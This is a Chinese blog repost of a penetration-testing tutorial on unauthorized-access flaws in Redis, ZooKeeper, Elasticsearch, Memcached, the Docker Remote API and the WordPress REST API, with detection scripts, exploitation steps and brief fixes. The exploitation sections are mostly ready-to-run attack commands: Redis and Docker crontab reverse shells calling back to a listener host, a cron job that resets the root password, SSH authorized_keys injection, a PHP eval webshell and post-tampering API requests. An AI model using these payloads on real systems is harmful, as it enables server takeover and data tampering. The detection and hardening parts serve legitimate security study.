未授权访问漏洞的检测与利用

最新推荐文章于 2024-05-10 09:15:00 发布
最新推荐文章于 2024-05-10 09:15:00 发布
阅读量2.9k 收藏 3
点赞数 1
分类专栏: 漏洞复现
原文链接:https://thief.one/2017/12/08/1/
版权

一、redis未授权访问漏洞

漏洞描述

redis安装完以后,默认是没有账号密码的(安装redis详细可参考:redis相关笔记,如果redis是以root权限去运行,则可以被反弹shell或者写入ssh密钥,从而被获取服务器的权限。

漏洞检测

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send("INFO\r\n")
result = s.recv(1024)
if "redis_version" in result:
    print "exist vul"

客户端连接测试一下:

$redis-cli -h host -p port
>CONFIG get requirepass
1) "requirepass"
2) ""
说明:表示没有设置密码,默认为没有密码。

漏洞利用

利用crontab反弹shell
自己服务器上监听一个端口(10.0.0.2)

nc -lvnp 4444

执行命令:

redis-cli -h 10.0.0.1
set x "\n* * * * * bash -i >& /dev/tcp/10.0.0.2/4444 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

利用crontab修改root密码
为了不覆盖原来的crontab,可以在etc/cron.d目录下写入计划任务,其次可以直接修改root密码。

redis-cli -h 10.0.0.1
set webshell "\n* * * * * root echo nmask | passwd --stdin root\n"
config set dir /etc/cron.d
config set dbfilename root
save

写ssh-keygen公钥登录服务器
利用条件:

1.redis对外开放,且未授权访问(默认配置)
2.服务器的ssh对外开放,可通过key登录

详细攻击方式如下:

准备好自己的公钥,写入本地文件text.txt。
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
2. 通过redis将该文件写入内存
$ redis-cli -h 10.0.0.1 flushall
$ cat test.txt | redis-cli -h 10.0.0.1 -x set crackit
3. 利用redis-cli 写入配置的方式将公钥写入到.ssh目录下
$ redis-cli -h 10.0.0.1
10.0.0.1:6379> config set dir /Users/nmask/.ssh/
OK
10.0.0.1:6379> config get dir
1) "dir"
2) "/Users/nmask/.ssh"
10.0.0.1:6379> config set dbfilename "authorized_keys"
OK
10.0.0.1:6379> save
OK

获取web服务的webshell
当redis权限不高时,并且服务器开着web服务,在redis有web目录写权限时,可以尝试往web路径写webshell。

config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php @eval($_POST['test']);?>"
save

说明:执行以上命令,即可将shell写入web目录。

漏洞修复

到redis安装目录下,配置redis.conf文件:
1、默认只对本地开放
bind 127.0.0.1
2、添加登陆密码
requirepass www.secpulse.com
3、在需要对外开放的时候修改默认端口
port 2333
4、最后还可以配合iptables限制开放

二、ZooKeeper未授权访问漏洞

漏洞描述

安装zookeeper之后默认是没有账号密码的,即没有权限校验,可被远程利用,通过目标服务器收集敏感信息,或者破坏zookeeper集群。

漏洞检测

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send("envi")
result = s.recv(1024)
if "zookeeper.version" in result:
    print "exist vul"

漏洞利用

执行以下命令即可远程获取该服务器的环境:

echo envi | nc ip port

直接连接:

./zkCli.sh -server ip:port

漏洞修复

1、禁止把Zookeeper直接暴露在公网
2、添加访问控制,根据情况选择对应方式(认证用户,用户名密码)
3、绑定指定IP访问

三、Elasticsearch未授权访问

漏洞描述

ELK是一款日志分析工具,默认监听9200端口,如果没有设置访问权限,可被非法操作数据。

漏洞检测

conn = httplib.HTTPConnection(ip, port, True, TIMEOUT)
conn.request("GET", '/_cat/master')
resp = conn.getresponse()
if resp.status == 200:
    print "exist vul"

漏洞利用

相当于一个API,任何人访问这个地址,就可以调用api,进行数据的增删改操作。
http://x.x.x.x:9200/_nodes
http://x.x.x.x:9200/_river

漏洞修复

1、防火墙上设置禁止外网访问9200端口。
2、使用Nginx搭建反向代理,通过配置Nginx实现对Elasticsearch的认证
3、限制IP访问,绑定固定IP
4、在config/elasticsearch.yml中为9200端口设置认证:

http.basic.enabled true #开关,开启会接管全部HTTP连接
http.basic.user "admin" #账号
http.basic.password "admin_pw" #密码
http.basic.ipwhitelist ["localhost", "127.0.0.1"]

四、memcache未授权访问

漏洞描述

memcached是一套常用的key-value缓存系统,其本身并没有权限控制模块,因此攻击者通过命令交互可直接读取memcached中的敏感信息。

漏洞检测

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send("stats")
result = s.recv(1024)
if "STAT version" in result:
    print "exist vul"

漏洞利用

nc -vv <target> 11211

说明:连接成功,则可获取memcached中的敏感信息。

漏洞修复

1、设置memchached只允许本地访问
2、禁止外网访问Memcached 11211端口
3、编译时加上–enable-sasl,启用SASL认证

五、Docker未授权访问

漏洞描述

Docker Remote API是一个取代远程命令行界面(rcli)的REST API。通过 docker client 或者 http 直接请求就可以访问这个 API,通过这个接口,我们可以新建 container,删除已有 container,甚至是获取宿主机的 shell。

漏洞检测

conn = httplib.HTTPConnection(ip, port, True, TIMEOUT)
conn.request("GET", '/containers/json')
resp = conn.getresponse()
if resp.status == 200 and "HostConfig" in resp.read():
    print "exist vul"

漏洞利用

获取所有images

http://host:2375/containers/json

getshell的方式与redis利用差不多。

利用计划任务反弹shell

echo -e "*/1 * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",8088));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" >> /etc/crontab

漏洞修复

1、在不必需的情况下,不要启用docker的remote api服务,如果必须使用的话,可以采用如下的加固方式:
设置ACL,仅允许信任的来源IP连接;
设置TLS认证,官方的文档为Protect the Docker daemon socket
2、客户端连接时需要设置以下环境变量export DOCKER_TLS_VERIFY=1

export DOCKER_CERT_PATH=~/.docker
export DOCKER_HOST=tcp://10.10.10.10:2375
export DOCKER_API_VERSION=1.12

3、在 docker api 服务器前面加一个代理,例如 nginx,设置 401 认证

六、wordpress未授权访问漏洞

漏洞描述

wordpress未经授权的攻击者利用该漏洞可注入恶意内容,以及进行提权,对文章、页面等内容进行修改。REST API是最近添加到WordPress 4.7.0并默认启用的。

漏洞利用

查看文章列表:

GET /index.php/wp-json/wp/v2/posts HTTP/1.1

修改文章内容:

POST /index.php/wp-json/wp/v2/posts/500?id=500 HTTP/1.1
Host: xxx.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36
Content-Type: application/json
Content-Length: 43
{"title":"x x x x"}

说明:如果返回 401 则无权限修改;返回200表示修改成功。

-Yanug-
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一文解决:Swagger API 授权访问漏洞问题
LiamHong_的博客
10-27 2万+
是一个用于设计、构建、文档化和使用风格的 Web 服务的开源软件框架。它通过提供一个交互式文档页面,让开发者可以更方便地查看和测试 API 接口。然而,在一些情况下,授权访问可能会导致安全漏洞。本文将介绍如何解决问题。
zookeeper授权访问(CVE-2014-0085)漏洞修复建议
THZLYXX的博客
01-24 2682
xxxx为需要设置的四字命令,添加多命令请使用逗号进行隔开,请根据系统所需进行命令设置,请勿添加envi命令,如系统有使用此命令的需求请使用其他修复方法。1.进入zookeeper目录找到zoo.cfg文件,常见路径为/opt/zookeeper-3.4.13/conf/zoo.cfg。2.使用下面命令登录zookeeper命令中ip为容器ip如果直接安装在服务器上请使用服务器ip。2.使用vi编辑器打开zoo.cfg文件,在文件中添加四字命令白名单,添加命令如下。:访问(Access)
10大漏洞评估和渗透测试工具
最新发布
weixin_51725318的博客
05-10 788
10大漏洞评估和渗透测试工具
zk添加访问白名单
独孤飞磊
11-20 2747
ZK的节点有5种操作权限: CREATE、READ、WRITE、DELETE、ADMIN 也就是 增、删、改、查、管理权限,这5种权限简写为crwda 1.登陆zookeeper 进入zookeeper安装目录下的bin目录下执行 ./zkCli.sh -server ip:port 例如: ./zkCli.sh -server 10.100.254.107:2181 2.查看当前权限 getAcl / 3.添加可访问IP setAcl / ip:10.100.254.113:cdrwa,ip:10.100
Elasticsearch授权访问漏洞
12-22 7181
  Elasticsearch服务普遍存在一个授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 0x00 Elasticsearch 安装 前提,保证安装了JDK 1.7+ 下载地址:https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip (用迅雷打开下载,...
API接口漏洞案例—接口授权
2301_77360081的博客
06-08 2504
本案例是最近在某车企的SRC众测中发现的一个比较常见的API接口授权漏洞,该接口泄露了大量的客户敏感信息,利用这些敏感信息还可进行更深度的漏洞挖掘。其漏洞危害比较大,故将其作为一个漏洞案例分享出来给大家。
Android系统漏洞检测利用方法的研究与实现.pdf
06-20
在Android系统漏洞检测利用的研究与实现中,我们聚焦于Android平台的安全性,特别是针对应用程序安全性和漏洞检测工具的开发。研究背景表明,随着Android设备的普及,其安全性成为了一个日益重要的问题,因为恶意...
Swagger API漏洞利用-JavaScript开发
05-26
尝试 GET / POST 所有接口,返回 Response Code / Content-Type / Content-Length ,用于分析接口是否可以授权访问利用 分析接口是否存在敏感参数,例如url参数,容易引入外网的SSRF漏洞 检测 API认证绕过漏洞 在...
swagger-exp:Swagger API漏洞利用
03-25
遍历所有API接口,自动填充参数尝试GET / POST所有接口,返回响应代码/ Content-Type / Content-Length,用于分析接口是否可以授权访问利用分析接口是否存在敏感参数,例如url参数,容易约会外网的SSRF细分检测API...
EDU漏洞挖掘建议与方法
08-14
授权访问接口指的是攻击者可以授权访问教育机构的接口,例如数据库接口、文件系统接口等。越权漏洞指的是攻击者可以越权访问教育机构的敏感信息,例如管理员账户等。 在授权访问接口和越权漏洞挖掘中,我们...
seeyonAjaxGetshell:致远OA seeyon授权漏洞批量getshell
05-28
由于致远OA旧版本某些ajax接口存在授权访问,攻击者通过构造恶意请求,可在无需登录的情况下上传恶意脚本文件,从而控制服务器。致远OA官方已针对该漏洞提供补丁,该漏洞利用代码已在互联网上公开流传。阿
最佳实践:解决 Swagger API 中的授权访问漏洞
2301_79125642的博客
10-27 954
投的前端开发,base杭州,10.27上午人工第一面,被疯狂抠细节拷打,答的不太好晚上看了一下状态,从AI面试变成了二轮面试进行中所以,这是人工第一面过了,还是。12人一组,一清一北?坏消息,是顺丰的低价,设计岗在深圳那么点钱估计活不下去,xdm我要接吗还是等其他的,本人广东人, 目前满帮三面、615hr面,其他大大小小银行和联通等还在流程中。市场上有很多大厂,虽然打着同一杆大旗,但里面的业务五花八门,人员的福利体系也千差万别,拿到同一个大厂的offer,签约公司却很可能不一样,比如,腾讯、华为、阿里。
Python3学习(32)--序列和反序列化(一)
Appleyk的专栏
09-21 1万+
本篇,我将分为两个章节来讲一下,什么是Python 的序列化,以及Python的序列化在不同语言之间的应用(第二篇将会讲到),当然,有正就有负,有左就要有右,有上就要有下,等等,事物的存在都是有两面性的,因此,讲Python的序列化的时候,就不得不讲到反序列化,如果将这两个概念比喻成行为的话,那么就相当于一个在包装,一个在分解。 序列化 我们举个简单的例子,就拿1+1来
渗透测试 重点方法检测网站漏洞
网站安全专家
09-25 1803
这几天整理了下网站渗透测试中基础部分的第三节,我们SINE安全渗透工程师对代码安全审计,手工渗透测试检查代码的危险漏洞方法,找出安全问题重点,配合工具扫描来达到测试漏洞的目的,本测试重点仅限于客户授权才能操作,切记忽非法尝试入侵!以下方法只是提供网站安全检测的具体参考意见。 1.5. 代码审计 1.5.1. 简介 代码审计是找到应用缺陷的过程。其通常有白盒、黑盒、灰盒等方式。白盒指通过对...
WEB安全之:越权访问
f_carey的博客
07-08 4898
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 越权访问1 越权简介1.1 实验平台1.2 越权漏洞的危害1.3 产生越权漏洞的原因2 水平越权3 垂直越权4 预防越权 越权访问(Broken Access Control,简称BAC)是一种很常见的逻辑安全漏洞。可以理解为服务器端对客户提出的数据操作请求过分信任,一个用户一般只能够对自己本身的信息进行增删改.
内网渗透实战技巧
热门推荐
谢公子的博客
09-28 1万+
目录 拿下Web服务器 phpmyadmin后台getshell 后渗透第一步 派生CobaltStrike权限 获得System权限 获取账号密码 远程桌面登录 添加路由、挂Socks4a代理 域信息收集 内网主机信息收集 内网存活主机探测 内网存活主机端口扫描 内网存活主机服务探测 内网横向渗透攻击技巧 MS17-010 CVE-2019-0708 pse...
Memcached 授权漏洞利用
tangshuangsss的专栏
12-17 5403
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介Memcached是一套常用的key-value缓存系统,由于它本身没有权限控制模块,所以开放在外网的Me...
memcached 常用命令及使用说明
06-28 586
memcached 查看方法 格式: telnet ip port 例如 telnet localhost 11211 退出命令:quit 一.存储命令 存储命令格式: [plain] view plaincopy           参数说明: comm
授权访问漏洞原理和防御
03-28
授权访问漏洞是指攻击者可以在授权的情况下访问某个系统或应用程序中的敏感信息或功能。这种漏洞可能导致数据泄露、恶意操作或系统崩溃等问题,严重影响系统安全和稳定性。以下是授权访问漏洞的原理和防御措施。 原理: 授权访问漏洞的原因通常是由于系统或应用程序中的权限配置不当或认证机制存在缺陷。攻击者可以通过各种手段绕过认证机制或者利用系统的漏洞获取高权限操作的权限,从而访问系统中的敏感信息或者执行恶意操作。 防御: 1. 确保权限配置正确 系统和应用程序中的权限配置应该严格按照实际需要进行设置,并确保只授予必要的权限。此外,还应定期审查和更新权限配置,防止权限泄露或者滥用。 2. 加强认证机制 认证机制应该严格按照安全最佳实践进行设置,包括密码复杂度要求、账户锁定等措施。同时,应该采用多因素认证等更加安全的认证方式。 3. 对敏感操作进行审计 对系统中的敏感操作进行审计,记录每个用户的操作记录,及时发现和防止不当操作或者恶意行为。 4. 及时修补漏洞 及时修补系统和应用程序中的漏洞,防止攻击者利用漏洞进行授权访问。 5. 强化网络安全防护 加强网络安全防护,包括入侵检测、防火墙等措施,及时发现和阻止攻击者的网络攻击行为。 总之,授权访问漏洞是一种常见的安全风险,需要通过加强权限配置、认证机制、审计、漏洞修补和网络安全防护等多方面措施来防范和应对。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值